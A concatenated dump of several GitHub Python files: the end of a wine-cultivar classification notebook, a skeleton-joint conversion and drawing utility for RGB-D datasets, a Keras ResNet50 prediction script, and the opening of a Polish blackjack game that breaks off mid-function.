auc)\n\n\n# # The model is trained well as the AOC is almost 1.00(0.97) and all other metrics of Accuracy, Recall, Precision,,and F1-score are all above 95% and close 1.0, the highest value for all; metrics. \n# # This means that the trained model couldidentify Cultivar0 as Cultivar0, Cultivar1 as Cultivar1 and Cultivar2 as Cultivar2 . The model is trained to be able to distinguish between (and therfore, predict correctly) between Cultivar_Types.\n\n# # 8.\tNext, use the relevant portion of your dataset (as dictated by the chosen algorithm) to evaluate the performance of your model. Again, use all relevant metrics for your algorithm to discuss the outcome in terms of model’s accuracy and usefulness in generating predictions. These may include such metrics as SSE, MSSE, Silhouette scores, completeness scores, confusion matrix, AOC curve, etc. as dictated by and available for your chosen machine language algorithm.\n\n# In[119]:\n\n\n#Generate predictions to evaluate the testing model using X_Test data and predicting Y\n\nYtest_predict = log_reg.predict(X_test)\n\n\n# In[120]:\n\n\n# Our resulting Y_predict variable is of shape (36,). so, it needs to be converted to (36,1) 2-D array\n# to a new result dataframe\npredict_ytest = Ytest_predict.reshape(-1,1)\nprint(predict_ytest.shape)\n\n\n# In[121]:\n\n\n# The Y_test contains values of our target variable (Cultivar). There were 36 records in the test data. So, Y_test\n# has a shape of (36,) - one dimesional. We'll need to reshape this into 2-D (36 rows, 1 column of Y-values)\n\ntest_y = (Y_test.values).reshape(-1,1)\nprint(test_y.shape)\nprint(test_y.size)\n\n\n# In[122]:\n\n\n# We need to obtain probabilities for our predictions. For this, we need to use predict_proba() function of the \n# logistic regression model we instantiated earlier during model training and predictions. \n\ntest_predicted_probs = log_reg.predict_proba(X_test)\nprint(test_predicted_probs)\n\n\n# In[123]:\n\n\n#Finally, we add all three variables into a Pandas Dataframe for display purposes. \n\nnp.set_printoptions(suppress=True) \nimport pandas as pd\npd.set_option('display.precision',11)\npd.DataFrame({'2':[.001]}) \n\n# this is to prevent small values being displayed in scientific notations\ntest_prob_results_df = pd.DataFrame(test_predicted_probs)\ntest_prob_results_df[\"Predicted\"] = predict_ytest\ntest_prob_results_df[\"Actual\"] = test_y\ntest_prob_results_df.head(40)\n\n\n# Note columns(0, 1 and 2) represents the probability of classifying an observation as being classified as 0,1 and 2 as it is a multinomial classification Cultivar1, Cultivar2, Cultivar3\n# respectively. \n#So, for the first record, the value predicted by the model for Cultivar Type is \"2\" and the actual Cultivar_Type value for that observation in the test dataset is also \"2\"\n#Probaility that this observation is correctly classified as being 2 is 0.85333574416. While the proabability that is is \n# misclassified as 0 is 0.00124438217 and as 1 is 0.14541987367 respectively\n\n#Judging from these probabilities for all the 36 records, the model is predicting with high level of accuarcy.\n#Since high-level here is Hard to say. It can be interpreted correctly by evaluating various metrics. \n\n\n# In[124]:\n\n\n#In case of more data we could have trained the model more better\n\n\n# In[125]:\n\n\n# Let's evaluate the model based on predictions generated above\n\nfrom sklearn.metrics import classification_report\nfrom sklearn import metrics\n\nprint(classification_report(Y_test,Ytest_predict))\n\n\n# In[126]:\n\n\nconf_matrix = metrics.confusion_matrix(Y_test, Ytest_predict)\nconf_matrix\n\n\n# # Understanding the confusion metrics output of multiclass-classification\n# \n# #Predicted values\n# 0 1 2\n# 0 ([[13, 1, 0],\n# #Actual values 1 [ 1, 12, 0],\n# 2 [ 0, 0, 9]])\n# \n# Based on the Confusion Matrix, we can see that the predictive performance of the trained model is very\n# good. Of the total 36 cases, 94.4% are predicted correctly (36.11% Cultivar0, 33.33% Cultivar1 and 25% Cultivar2 ) while only\n# 5.6% are incorrectly predicted. This is further supported by the fact that Recall,Accuracy, Precision, and\n# F1-score is >= 0.94, very close to 1.0, the ideal score. \n\n# In[127]:\n\n\nprint(\"Accuracy:\",metrics.accuracy_score(Y_test, Ytest_predict))\n\n\n# In[128]:\n\n\nprint(\"Precision:\",metrics.precision_score(Y_test,Ytest_predict, average = \"macro\"))\nprint(\"Recall:\",metrics.recall_score(Y_test,Ytest_predict,average = \"macro\"))\n\n\n# In[129]:\n\n\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn.preprocessing import LabelBinarizer\ndef multiclass_roc_auc_score(y_test, y_pred, average=\"macro\"):\n lb = LabelBinarizer()\n lb.fit(y_test)\n y_test = lb.transform(y_test)\n y_pred = lb.transform(y_pred)\n return roc_auc_score(y_test, y_pred, average=average)\nauc = multiclass_roc_auc_score(Y_test, Ytest_predict, average=\"macro\")\nprint(\"Area under curve : \", auc)\n\n\n# # The AOC is also close to 1.0. Hence, the trained Logistic Regression model is useful in accuaretly predicting the Cultivar type based on the chemical characteristics of wine\n\n# \n# ## ######################################################################\n# Accuracy of the model is : 94.4# percent(The model can calculate 94% accurately)\n# ######################################################################\n# Recall score of the complete model is 95%\n# Recall score of predicting Cultivar = 0 is 93%\n# Recall score of predicting Cultivar = 1 is 92%\n# Recall score of predicting Cultivar = 2 is 100%\n# #####################################################################\n# Precision score of the complete model is 95%\n# Precision score of predicting Cultivar = 0 is 93%\n# Precision score of predicting Cultivar = 1 is 92%\n# Precision score of predicting Cultivar = 2 is 100%\n# #####################################################################\n# F1 score of the complete model is 95%\n# F1 score of predicting Cultivar = 0 is 93%\n# F1 score of predicting Cultivar = 1 is 92%\n# F1 score of predicting Cultivar = 2 is 100%\n# #####################################################################\n\n# ## #####\n# # Area Under the Curve is calculated =0.96\n# # Higher the AUC, better the model is at predicting 0s as 0s and 1s as 1s and 2's as 2's. By analogy, Higher the AUC, better the model is at distinguishing between Cultivar Types under three to three categories\n# #As our Classification, auc score is 0.96 i.e; the model can classify between 0's, 1's,2's and predict them with around 94% accuracy\n# #This indicates our model is worthy and also a good model in predicting the survival Cultivar categories\n\n# ## #####################################################################\n# #Recall:\n# It talks about the quality of the machine learning model when it comes\n# to predicting a positive class. So out of total positive classes, how many\n# was the model able to predict correctly? This metric is widely used as\n# evaluation criteria for classification models.\n# The recall values of our model are\n# ######################################################################\n# Recall score of the complete model is 95%\n# Recall score of predicting Cultivar = 0 is 93%\n# Recall score of predicting Cultivar = 1 is 92%\n# Recall score of predicting Cultivar = 2 is 100%\n# #which is good\n# #####################################################################\n# #Precision:\n# Precision is about the number of actual positive cases out of all the positive\n# cases predicted by the model\n# The precision values of our model are\n# #####################################################################\n# Precision score of the complete model is 95%\n# Precision score of predicting Cultivar = 0 is 93%\n# Precision score of predicting Cultivar = 1 is 92%\n# Precision score of predicting Cultivar = 2 is 100%\n# #which are good\n# ################################################################\n# #F1 Score:\n# It considers both the precision p and the recall r of the test to compute the score\n# The F1score values of our model are\n# #which are good\n# #####################################################################\n# F1 score of the complete model is 95%\n# F1 score of predicting Cultivar = 0 is 93%\n# F1 score of predicting Cultivar = 1 is 92%\n# F1 score of predicting Cultivar = 2 is 100%\n# #####################################################################\n# # Area Under the Curve is calculated =0.9604525908873734\n# # Higher the AUC, better the model is at predicting 0s as 0s and 1s as 1s. By analogy, Higher the AUC, better the model is at distinguishing between Cultivartypes that\n# #As our Classification, auc score is 0.96 i.e; the model can classify between 0's, 1's, 2's and predict them with around 94# accuracy\n# #This indicates our model is worthy and also a good model in predicting the Cultivar types\n# ########################################################################\n# Accuracy of the model is :94.4 percent(The model can calculate 94% accurately)\n\n# # In case of non linear data and high overlapping between the target classes we can use the following algorithms(Decision Tree and Random Forest) for classification when complexity and time are not a matter of issue(Optional)\n\n# In[130]:\n\n\n# Checking Decision Tree Classifier\n\n\n# In[131]:\n\n\nimport pandas as pd\nfrom sklearn.tree import DecisionTreeClassifier # Import Decision Tree Classifier\nfrom sklearn.model_selection import train_test_split # Import train_test_split function\nfrom sklearn import metrics\n\n\n# In[132]:\n\n\n#Creating an instance of Decision tree classifier\nDTC = DecisionTreeClassifier()\n\n# Apllying Decision Tree Classifer on the training data\nDTC = DTC.fit(X_train,Y_train)\n\nDTC_prob = DTC.predict_proba(X_test)\n#Predict the response for test dataset\nDTC_y_pred = DTC.predict(X_test)\n\n\n# In[133]:\n\n\n#Looking at the predictions\nDTC_y_pred\n\n\n# In[134]:\n\n\n#Creating a pandas dataframe for Decision tree result\nDTC_results_df = pd.DataFrame(DTC_prob)\ntest_prob_results_df[\"Predicted\"] = DTC_y_pred\ntest_prob_results_df[\"Actual\"] = test_y\ntest_prob_results_df.head(20)\n\n\n# In[135]:\n\n\nprint(\"Accuracy:\",metrics.accuracy_score(Y_test, DTC_y_pred))\n#Clearly has less accuracy compared to logistic regression model\n\n\n# In[136]:\n\n\n# Let's evaluate the model based on predictions generated above\n\nfrom sklearn.metrics import classification_report\nfrom sklearn import metrics\n\nprint(classification_report(Y_test,DTC_y_pred))\n\n\n# In[137]:\n\n\n#The precision, f1-score, recall are also less compared to logistic regression model\n\n\n# In[138]:\n\n\nauc = multiclass_roc_auc_score(Y_test,DTC_y_pred, average=\"macro\")\nprint(\"Area under curve : \", auc)\n#Auc is less when compared to Logistic regression but 0.9 is not a bad value\n\n\n# In[139]:\n\n\n# Random Forest is an ensemble technique which uses decision trees as the base learners it has if else loops which are time consuming\n\n\n# In[140]:\n\n\n# Checking Random Forest Classifier\n\n\n# In[141]:\n\n\nfrom sklearn.ensemble import RandomForestClassifier\n\n# Create the model with 100 trees\nRFC = RandomForestClassifier(n_estimators=100, \n bootstrap = True,\n max_features = 'sqrt')\n# Fit on training data\nRFC.fit(X_train,Y_train)\n\n\n# In[142]:\n\n\n# Actual class predictions\nRF_predictions = RFC.predict(X_test)\n# Probabilities for each class\nRF_probs = RFC.predict_proba(X_test)[:, 1]\n\n\n# In[143]:\n\n\n#Creating a pandas dataframe for Decision tree result\nDTC_results_df = pd.DataFrame(RF_probs)\ntest_prob_results_df[\"Predicted\"] = RF_predictions \ntest_prob_results_df[\"Actual\"] = test_y\ntest_prob_results_df.head(20)\n\n\n# In[144]:\n\n\nprint(\"Accuracy:\",metrics.accuracy_score(Y_test,RF_predictions))\n#Random forest also has accuracy value similar to logistic regression model\n\n\n# In[145]:\n\n\nfrom sklearn.metrics import classification_report, confusion_matrix, accuracy_score\n\nprint(confusion_matrix(Y_test,RF_predictions))\nprint(classification_report(Y_test,RF_predictions))\nprint(accuracy_score(Y_test,RF_predictions))\n\n\n# In[146]:\n\n\nauc = multiclass_roc_auc_score(Y_test,RF_predictions, average=\"macro\")\nprint(\"Area under curve : \", auc)\n\n\n# In[147]:\n\n\n# All the values like accuracy, f1score, recall, precision are same as logistic regression outputs which makes random forest also a good model to classify the Cultivar_Types\n\n","repo_name":"VenkataSowjanyaKoka/Grape-Category-Prediction","sub_path":"VenkataSowjanyaKoka-GrapeCategory-Prediction.py","file_name":"VenkataSowjanyaKoka-GrapeCategory-Prediction.py","file_ext":"py","file_size_in_byte":55512,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"17318799043","text":"\nimport numpy as np\nimport cv2\nimport time\nfrom pyVideoDatasets.DepthUtils import skel2depth, depth2world, world2depth\n\nN_MSR_JOINTS = 20\nN_KINECT_JOINTS = 14\n\n\ndef transform_skels(skels, transformation, output='image'):\n '''\n ---Parameters---\n skels : list of skeletons in frame 1\n transformation : 4x4 transform from frame 1 to 2\n output : 'image' or 'world' for either coordinate system\n ---Result---\n skels_out : skeletons in frame 2\n '''\n skels_out = []\n for skel_c1 in skels:\n if np.all(skel_c1 != -1):\n skels_mask = skel_c1 == 0\n # Convert to depth coordinate system\n skel_c1 = depth2world(skel2depth(skel_c1, [240,320]), [240,320])\n # Transform from cam1 -> cam2\n skel_c2 = np.dot(transformation[:3,:3], skel_c1.T).T + transformation[:3,3]\n\n if len(skel_c2) != N_MSR_JOINTS:\n skel_c2 = kinect_to_msr_skel(skel_c2)\n\n skel_c2[skels_mask] = 0\n\n if output=='world':\n skels_out += [skel_c2]\n elif output=='image':\n # Get skel in image (cam2) coordinates\n skel_im2 = world2depth(skel_c2, [240,320])\n skels_out += [skel_im2]\n\n\n return skels_out\n\n\n# ----------------------------------------------------------------\ndef kinect_to_msr_skel(skel):\n # SKEL_JOINTS = [0, 2, 3, 4, 5, 7, 8, 9, 11, 13, 15, 17, 19] # Low\n\n skel_msr = np.zeros([N_MSR_JOINTS, 3])\n skel_msr[3,:] = skel[0,:] #head\n skel_msr[1,:] = skel[1,:] #torso\n skel_msr[0,:] = skel[1,:] #torso\n skel_msr[4,:] = skel[2,:] #l shoulder\n skel_msr[5,:] = skel[3,:] #l elbow\n skel_msr[7,:] = skel[4,:] #l hand\n skel_msr[8,:] = skel[5,:] #r shoudler\n skel_msr[9,:] = skel[6,:] #r elbow\n skel_msr[11,:] = skel[7,:] #r hand\n skel_msr[12,:] = skel[8,:] #l hip\n skel_msr[13,:] = skel[9,:] #l knee\n skel_msr[15,:] = skel[10,:] #l foot\n skel_msr[16,:] = skel[11,:] #r hip\n skel_msr[17,:] = skel[12,:] #r knee\n skel_msr[19,:] = skel[13,:] #r foot\n\n return skel_msr.astype(np.int16)\n\ndef msr_to_kinect_skel(skel):\n # SKEL_JOINTS = [0, 2, 3, 4, 5, 7, 8, 9, 11, 13, 15, 17, 19] # Low\n\n skel_kinect = np.zeros([N_KINECT_JOINTS, 3], dtype=np.int16)\n skel_kinect[0,:] = skel[3,:] #head\n # skel_kinect[1,:] = skel[1,:] #torso\n skel_kinect[1,:] = skel[0,:] #torso\n skel_kinect[2,:] = skel[4,:] #l shoulder\n skel_kinect[3,:] = skel[5,:] #l elbow\n skel_kinect[4,:] = skel[7,:] #l hand\n skel_kinect[5,:] = skel[8,:] #r shoudler\n skel_kinect[6,:] = skel[9,:] #r elbow\n skel_kinect[7,:] = skel[11,:] #r hand\n skel_kinect[8,:] = skel[12,:] #l hip\n skel_kinect[9,:] = skel[13,:] #l knee\n skel_kinect[10,:] = skel[15,:] #l foot\n skel_kinect[11,:] = skel[16,:] #r hip\n skel_kinect[12,:] = skel[17,:] #r knee\n skel_kinect[13,:] = skel[17,:] #r foot\n\n return skel_kinect\n\ndef mhad_to_kinect_skel(skel):\n # SKEL_JOINTS = [0, 2, 3, 4, 5, 7, 8, 9, 11, 13, 15, 17, 19] # Low\n dims = skel.shape[1]\n skel_kinect = np.zeros([N_KINECT_JOINTS, dims], dtype=np.int16)\n\n if skel[2,0]!=0: #head\n skel_kinect[0,:] = skel[2,:]\n else:\n try:\n skel_kinect[0,:] = skel[0:3,:][np.argwhere(skel[0:3,2]!=0)[0]]\n except:\n pass\n\n if skel[3,0]!=0:#torso\n skel_kinect[1,:] = skel[3,:]\n else:\n try:\n skel_kinect[1,:] = skel[[3,4,6],:][np.argwhere(skel[[3,4,6],2]!=0)[0]]\n except:\n pass\n\n skel_kinect[2,:] = skel[12,:] #l shoulder\n skel_kinect[3,:] = skel[13,:] #l elbow\n # skel_kinect[4,:] = skel[15,:] if skel[15,0]!=0 else np.max(skel[16:19,:], 0) #l hand\n if skel[15,0]!=0: #l hand\n skel_kinect[4,:] = skel[15,:]\n else:\n try:\n skel_kinect[4,:] = skel[16:19,:][np.argwhere(skel[16:19,2]!=0)[0]]\n except:\n pass\n\n skel_kinect[5,:] = skel[20,:] #r shoudler\n skel_kinect[6,:] = skel[21,:] #r elbow\n # skel_kinect[7,:] = skel[23,:] if skel[23,0]!=0 else np.max(skel[23:27,:], 0) #r hand\n if skel[23,0]!=0:#r hand\n skel_kinect[7,:] = skel[23,:]\n else:\n try:\n skel_kinect[7,:] = skel[23:27,:][np.argwhere(skel[23:27,2]!=0)[0]]\n except:\n pass\n\n skel_kinect[8,:] = skel[28,:] #l hip\n skel_kinect[9,:] = skel[31,:] #l knee\n skel_kinect[10,:] = skel[33,:] if skel[33,0]!=0 else skel[34,:] #l foot\n skel_kinect[11,:] = skel[37,:] #r hip\n skel_kinect[12,:] = skel[39,:] #r knee\n skel_kinect[13,:] = skel[41,:] if skel[41,0]!=0 else skel[42,:] #r foot\n # print skel_kinect\n return skel_kinect\n\n# def mhad_to_kinect_skel(skel):\n# # SKEL_JOINTS = [0, 2, 3, 4, 5, 7, 8, 9, 11, 13, 15, 17, 19] # Low\n# dims = skel.shape[1]\n# skel_kinect = np.zeros([N_KINECT_JOINTS, dims], dtype=np.int16)\n# skel_kinect[0,:] = skel[2,:] if skel[2,0]!=0 else np.max(skel[0:3,:], 0) #head\n# skel_kinect[1,:] = skel[3,:] if skel[3,0]!=0 else np.max(skel[[3,4,7,8,19],:], 0)#torso\n# skel_kinect[2,:] = skel[12,:] #l shoulder\n# skel_kinect[3,:] = skel[13,:] #l elbow\n# skel_kinect[4,:] = skel[15,:] if skel[15,0]!=0 else np.max(skel[16:19,:], 0) #l hand\n# skel_kinect[5,:] = skel[20,:] #r shoudler\n# skel_kinect[6,:] = skel[21,:] #r elbow\n# skel_kinect[7,:] = skel[23,:] if skel[23,0]!=0 else np.max(skel[23:27,:], 0) #r hand\n# skel_kinect[8,:] = skel[28,:] #l hip\n# skel_kinect[9,:] = skel[31,:] #l knee\n# skel_kinect[10,:] = skel[33,:] if skel[33,0]!=0 else skel[34,:] #l foot\n# skel_kinect[11,:] = skel[37,:] #r hip\n# skel_kinect[12,:] = skel[39,:] #r knee\n# skel_kinect[13,:] = skel[41,:] if skel[41,0]!=0 else skel[42,:] #r foot\n# # print skel_kinect\n# return skel_kinect\n\ndef j11_to_kinect_skel(skel):\n skel_kinect = np.zeros([N_KINECT_JOINTS, 3], dtype=np.int16)\n skel_kinect[0,:] = skel[0,:] #head\n skel_kinect[2,:] = skel[1,:] #l shoulder\n skel_kinect[3,:] = skel[2,:] #l elbow\n skel_kinect[4,:] = skel[3,:] #l hand\n skel_kinect[5,:] = skel[4,:] #r shoudler\n skel_kinect[6,:] = skel[5,:] #r elbow\n skel_kinect[7,:] = skel[6,:] #r hand\n skel_kinect[9,:] = skel[7,:] #l knee\n skel_kinect[10,:] = skel[8,:] #l foot\n skel_kinect[12,:] = skel[9,:] #r knee\n skel_kinect[13,:] = skel[10,:] #r foot\n return skel_kinect\n\ndef j13_to_kinect_skel(skel):\n skel_kinect = np.zeros([N_KINECT_JOINTS, 3], dtype=np.int16)\n skel_kinect[0,:] = skel[0,:] #head\n skel_kinect[2,:] = skel[1,:] #l shoulder\n skel_kinect[3,:] = skel[2,:] #l elbow\n skel_kinect[4,:] = skel[3,:] #l hand\n skel_kinect[5,:] = skel[4,:] #r shoudler\n skel_kinect[6,:] = skel[5,:] #r elbow\n skel_kinect[7,:] = skel[6,:] #r hand\n skel_kinect[8,:] = skel[7,:] #l hip\n skel_kinect[9,:] = skel[8,:] #l knee\n skel_kinect[10,:] = skel[9,:] #l foot\n skel_kinect[11,:] = skel[10,:] #r hip\n skel_kinect[12,:] = skel[11,:] #r knee\n skel_kinect[13,:] = skel[12,:] #r foot\n return skel_kinect\n\ndef j14_to_kinect_skel(skel):\n skel_kinect = np.zeros([N_KINECT_JOINTS, 3], dtype=np.int16)\n skel_kinect[0,:] = skel[0,:] #head\n skel_kinect[1,:] = skel[1,:] #torso\n skel_kinect[2,:] = skel[2,:] #l shoulder\n skel_kinect[3,:] = skel[3,:] #l elbow\n skel_kinect[4,:] = skel[4,:] #l hand\n skel_kinect[5,:] = skel[5,:] #r shoudler\n skel_kinect[6,:] = skel[6,:] #r elbow\n skel_kinect[7,:] = skel[7,:] #r hand\n skel_kinect[8,:] = skel[8,:] #l hip\n skel_kinect[9,:] = skel[9,:] #l knee\n skel_kinect[10,:] = skel[10,:] #l foot\n skel_kinect[11,:] = skel[11,:] #r hip\n skel_kinect[12,:] = skel[12,:] #r knee\n skel_kinect[13,:] = skel[13,:] #r foot\n return skel_kinect\n\ndef j15_to_kinect_skel(skel):\n skel_kinect = np.zeros([N_KINECT_JOINTS, 3], dtype=np.int16)\n skel_kinect[0,:] = skel[0,:] #head\n skel_kinect[1,:] = skel[2,:] #torso\n skel_kinect[2,:] = skel[3,:] #l shoulder\n skel_kinect[3,:] = skel[4,:] #l elbow\n skel_kinect[4,:] = skel[5,:] #l hand\n skel_kinect[5,:] = skel[6,:] #r shoudler\n skel_kinect[6,:] = skel[7,:] #r elbow\n skel_kinect[7,:] = skel[8,:] #r hand\n skel_kinect[8,:] = skel[9,:] #l hip\n skel_kinect[9,:] = skel[10,:] #l knee\n skel_kinect[10,:] = skel[11,:] #l foot\n skel_kinect[11,:] = skel[12,:] #r hip\n skel_kinect[12,:] = skel[13,:] #r knee\n skel_kinect[13,:] = skel[14,:] #r foot\n return skel_kinect\n\nfrom skimage.draw import circle, line\ndef display_skeletons(img, skel, color=(200,0,0), skel_type='MSR', skel_contraints=None):\n '''\n skel_type : 'MSR' or 'Low' ##or 'Upperbody'\n '''\n\n if img.shape[0] == 480:\n pt_radius = 6\n tube_radius = 3\n else:\n pt_radius = 5\n tube_radius = 2\n\n img = np.ascontiguousarray(img)\n if skel_type == 'MSR':\n joints = range(N_MSR_JOINTS)\n joint_names = ['torso1', 'torso2', 'neck', 'head',\n 'r_shoulder', 'r_elbow', 'r_wrist', 'r_hand',\n 'l_shoulder', 'l_elbow', 'l_wrist', 'l_hand',\n 'r_pelvis', 'r_knee', 'r_ankle', 'r_foot',\n 'l_pelvis', 'l_knee', 'l_ankle', 'l_foot'\n ]\n connections = [\n [3, 2],[2,1],[1,0], #Head to torso\n [2, 4],[4,5],[5,6],[6,7], # Left arm\n [2, 8],[8,9],[9,10],[10,11], # Right arm\n [0,12],[12,13],[13,14],[14,15], #Left foot\n [0,16],[16,17],[17,18],[18,19] #Right foot\n ]\n head = 3\n elif skel_type == 'Low':\n joints = [0, 3, 4, 5, 7, 8, 9, 11, 13, 15, 17, 19] # Low\n # joints = [0, 2, 3, 4, 5, 7, 8, 9, 11, 13, 15, 17, 19]\n # joints = [0, 1, 2, 3, 4, 5, 7, 8, 9, 11, 13, 15, 17, 19]\n connections = [\n # [3, 2],[2,0], #Head to torso\n [3, 0], #Head to torso\n # [3, 2],[2,1],[1,0], #Head to torso\n [4,8], #connect shoulders\n [0, 4],[4,5],[5,7], # Left arm\n [0, 8],[8,9],[9,11], # Right arm\n [0,13],[13,15], #Left foot\n [0,17],[17,19]\n ]\n head = 3\n elif skel_type == 'Upperbody':\n joints = [0, 3, 4, 5, 7, 8, 9, 11]\n # joints = [0, 1, 2, 3, 4, 5, 7, 8, 9, 11]\n connections = [\n [3,0], #Head to torso\n [0, 4],[4,5],[5,7], # Left arm\n [4,8], #connect shoudlers\n [0, 8],[8,9],[9,11], # Right arm\n ]\n head = 3\n\n elif skel_type == 'Kinect':\n joints = range(14)\n connections = [\n [0,1], #Head to torso\n [1,2],[2,3],[3,4], # Left arm\n [2,5],# connect shoulders\n [1,5],[5,6],[6,7], # Right arm\n [1,8],[8,9],[9,10], #Left foot\n [1,11],[11,12],[12,13], #Right foot\n [8,11] #Bridge hips\n ]\n joint_names = ['head', 'torso', 'l_shoulder', 'l_elbow', 'l_hand',\n 'r_shoulder', 'r_elbow', 'r_hand',\n 'l_hip', 'l_knee', 'l_foot',\n 'r_hip', 'r_knee', 'r_foot']\n head = 0\n elif skel_type == 'Ganapathi':\n joints = range(15)\n connections = [\n [0,1],[1,2],#Head to neck, neck to torso\n [1,3],[3,4],[4,5], # Left arm\n [3,9],[6,12], # shoudlers to hips\n [1,6],[6,7],[7,8], # Right arm\n [2,9],[9,10],[10,11], #Left foot\n [2,12],[12,13],[13,14], #Right foot\n [9,12] #Bridge hips\n ]\n joint_names = ['head', 'neck', 'torso', 'l_shoulder', 'l_elbow', 'l_hand',\n 'r_shoulder', 'r_elbow', 'r_hand',\n 'l_hip', 'l_knee', 'l_foot',\n 'r_hip', 'r_knee', 'r_foot']\n head = 0\n elif skel_type == 'MHAD':\n joints = range(43)\n connections = [\n [0,1],[0,2] #Head to torso\n [1,2],[2,3],[3,4], # Left arm\n [2,5],# connect shoulders\n [1,5],[5,6],[6,7], # Right arm\n [1,8],[8,9],[9,10], #Left foot\n [1,11],[11,12],[12,13], #Right foot\n [8,11] #Bridge hips\n ]\n joint_names = ['head', 'torso', 'l_shoulder', 'l_elbow', 'l_hand',\n 'r_shoulder', 'r_elbow', 'r_hand',\n 'l_hip', 'l_knee', 'l_foot',\n 'r_hip', 'r_knee', 'r_foot']\n head = 0\n\n elif skel_type == 'Other':\n joints = range(len(skel))\n connections = skel_contraints\n head = 0\n\n for i in joints:\n j = skel[i]\n # Remove zero nodes\n try:\n if not (j[0] <= 0 or j[1] <= 0):\n # circ = skimage.draw.circle(j[0],j[1], 5)\n # img[circ[0], circ[1]] = color\n cv2.circle(img, (j[1], j[0]), pt_radius, color, -1)\n except:\n pass\n\n # Make head a bigger node\n cv2.circle(img, (skel[head,1], skel[head,0]), pt_radius*3, color)\n\n for c in connections:\n # Remove zero nodes\n if not ( (skel[c[0],0]==0 and skel[c[0],1]==0) or (skel[c[1],0]==0 and skel[c[1],1]==0)):\n # if not ( (skel[c[0],0]<=0 and skel[c[0],1]<=0) or (skel[c[1],0]<=0 and skel[c[1],1]<=0)):\n cv2.line(img, (skel[c[0],1], skel[c[0],0]), (skel[c[1],1], skel[c[1],0]), color, tube_radius)\n\n return img\n","repo_name":"colincsl/RGBD-Dataset-Reader","sub_path":"pyVideoDatasets/SkeletonUtils.py","file_name":"SkeletonUtils.py","file_ext":"py","file_size_in_byte":13765,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"32"} +{"seq_id":"1071677865","text":"\nimport json, os, re, sys, time\nimport numpy as np\n\nfrom keras import backend as K\nfrom keras.applications.imagenet_utils import preprocess_input\nfrom keras.models import load_model\nfrom keras.preprocessing import image\n\n\ndef predict(img_path, model):\n img = image.load_img(img_path, target_size=(224, 224))\n x = image.img_to_array(img)\n x = np.expand_dims(x, axis=0)\n preds = model.predict(x)\n return preds\n\n\nCLASS_INDEX = None\nJSON_PATH = \"idenprof_model_class.json\"\n\n\ndef decode_predictions(preds, top=5, model_json=\"\"):\n global CLASS_INDEX\n\n if CLASS_INDEX is None:\n CLASS_INDEX = json.load(open(model_json))\n results = []\n for pred in preds:\n top_indices = pred.argsort()[-top:][::-1]\n for i in top_indices:\n each_result = []\n each_result.append(CLASS_INDEX[str(i)])\n each_result.append(pred[i])\n results.append(each_result)\n\n return results\n\n\n\nif __name__ == '__main__':\n model_path = \"resnet50_best.h5\"\n print('Loading model:', model_path)\n t0 = time.time()\n model = load_model(model_path)\n t1 = time.time()\n print('Loaded in:', t1-t0)\n\n test_path = \"7032-2.jpg\"\n print('Generating predictions on image:', test_path)\n preds = predict(test_path, model)\n predictiondata = decode_predictions(preds, top=int(1), model_json=JSON_PATH)\n print(predictiondata)\n #model.summary()","repo_name":"maxVeremchuk/courseWork","sub_path":"imageRecognition/doorImages/resnet50model_predict.py","file_name":"resnet50model_predict.py","file_ext":"py","file_size_in_byte":1415,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35170279264","text":"import random\nfrom karta import Karta\n\n\ndef utworz_talie():\n \"\"\"Tworzy talię 54 kart\"\"\"\n\n kolory = [\"Trefl\", \"Karo\", \"Kier\", \"Pik\"]\n figury = {\n \"2\": 2,\n \"3\": 3,\n \"4\": 4,\n \"5\": 5,\n \"6\": 6,\n \"7\": 7,\n \"8\": 8,\n \"9\": 9,\n \"10\": 10,\n \"Jopek\": 10,\n \"Dama\": 10,\n \"Król\": 10,\n \"As\": 11,\n }\n talia_lista = []\n\n for kolor in kolory:\n for figura in figury:\n karta = Karta(kolor, figura, figury[figura])\n talia_lista.append(karta)\n\n return talia_lista\n\n\ndef hit_or_stay():\n \"\"\"Decyzja o dalszym dokładaniu kart\"\"\"\n\n decision = input(\"Chcesz dalej dokładać karty? Wpisz 'T' lub 'N':\")\n return decision\n\n\ndef bet():\n \"\"\"Określa kwotę betu\"\"\"\n\n amount = input(\"Ile chciałłbyś postawić? Wpisz kwotę:\")\n return int(amount)\n\n\ndef tasuj(talia):\n \"\"\"Tasuje talię\"\"\"\n\n random.shuffle(talia)\n\n return talia\n\n\ndef imie_gracza():\n \"\"\"Nadanie imienia graczowi, wyświetlenie powitania\"\"\"\n imie = input(\"Witaj w grze Blackjack, jak się nazywasz?\")\n print(\n f\"Cześć {imie}. Będziesz grał przeciwko komputerowi o imieniu Bernard. Powodzenia!\"\n )\n gracze = [imie, \"Bernard\"]\n\n return gracze\n\n\ndef starting_bankroll(gracz, komputer):\n \"\"\"Określenie depozytu początkowego\"\"\"\n\n numbers = \"0123456789\"\n validformat = False\n while validformat == False:\n suma = input(\"Jaką kwotę pieniędzy przyznać na początku każdemu z graczy?\")\n validformat = True\n for i in suma:\n if i not in numbers:\n validformat = False\n print(\"Początkowa kwota musi być liczbą dodatnią! Spróbuj jeszcze raz!\")\n break\n if suma == \"0\":\n print(\"Kwota nie może być równa 0! Spróbuj jeszcze raz!\")\n validformat = False\n\n print(f\"Depozyt gacza {gracz} został zasilony kwotą {suma} $.\")\n print(f\"Depozyt komputera {komputer} został zasilony kwotą {suma} $.\")\n\n return int(suma)\n\n\ndef suma_gracza_check(gracz, sumka, przeciwnik, pula):\n \"\"\"Monitorowanie sumy kart gracza\"\"\"\n\n if sumka > 21:\n print(\n f\"Suma gracza {gracz} przekroczyła 21 punktów i wynosi {sumka}. {przeciwnik} wygrywa i zgarnia {pula} $.\"\n )\n return False\n else:\n return True\n\n\ndef stawkafn(graczdepo, komputerdepo):\n \"\"\"Określenie stawki danej partii\"\"\"\n\n lista = list((graczdepo, komputerdepo))\n numbers = \"0123456789\"\n kwota = False\n while kwota == False:\n stawka = input(\"Jaką kwotę chciałbyś postawić?\")\n kwota = True\n for x in stawka:\n if x not in numbers:\n print(\"Kwota stawki musi być liczbą dodatnią!\")\n kwota = False\n if int(stawka) <= komputerdepo and int(stawka) <= graczdepo:\n return int(stawka)\n else:\n print(\n f\"Zbyt duża kwota! Stawka nie może przekraczać depozytu gracza z najmniejszymi środkami. Wybierz kwotę od 0 do {min(lista)}.\"\n 